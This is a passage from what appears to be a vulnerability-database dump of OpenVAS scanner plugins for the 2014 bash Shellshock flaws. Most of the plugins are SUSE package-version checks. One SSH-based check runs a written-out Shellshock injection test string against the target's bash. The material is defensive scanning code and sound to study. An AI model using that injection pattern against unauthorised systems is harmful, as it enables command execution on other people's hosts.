author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850676\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 10:31:31 +0200 (Fri, 18 Sep 2015)\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\n\n This NVT has been deprecated because no proper information available\n from advisory link.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bash was updated to fix command injection via environment variables.\n (CVE-2014-6271, CVE-2014-7169)\n\n Also a hardening patch was applied that only imports functions over\n BASH_FUNC_ prefixed environment variables.\n\n Also fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents\n and for loop issue\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1254-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as proper information is not available in advisory. There is also no bash~4.2~75.4.1 on opensuse. the complete NVT is wrong.\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850616", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850616\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:10 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1242-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eadline-doc\", rpm:\"eadline-doc~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850615", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850615\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:25 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 12.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1229-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eadline-doc\", rpm:\"eadline-doc~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:40", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802085", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_03.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802085\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 15:52:31 +0530 (Wed, 01 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n script_xref(name:\"URL\", value:\"https://shellshocker.net/\");\n script_xref(name:\"URL\", value:\"http://lcamtuf.blogspot.in/2014/09/bash-bug-apply-unofficial-patch-now.html\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-7169, CVE-2014-6271, and CVE-2014-6277\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-026\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"vt_test='() { echo vulnerable; }' /bin/bash -c vt_test\" | /bin/bash\ncmd = 'echo \"' + \"vt_test='() { echo CVE-2014-6278 vulnerable; }' \" + bash_cmd + \" -c vt_test\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"Unsupported use of '='\" >< result ) exit( 99 );\n\nif( \"CVE-2014-6278 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-13T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850778", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850778", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850778\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and is less serious due to the\n special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_.\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally, two other security issues have been fixed:\n\n * CVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\n * CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1247-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5\", rpm:\"libreadline5~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-32bit\", rpm:\"libreadline5-32bit~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-x86\", rpm:\"bash-x86~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-x86\", rpm:\"libreadline5-x86~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850890", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850890\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:37:55 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1259-1\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7169\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7187\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-6271\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7186\");\n 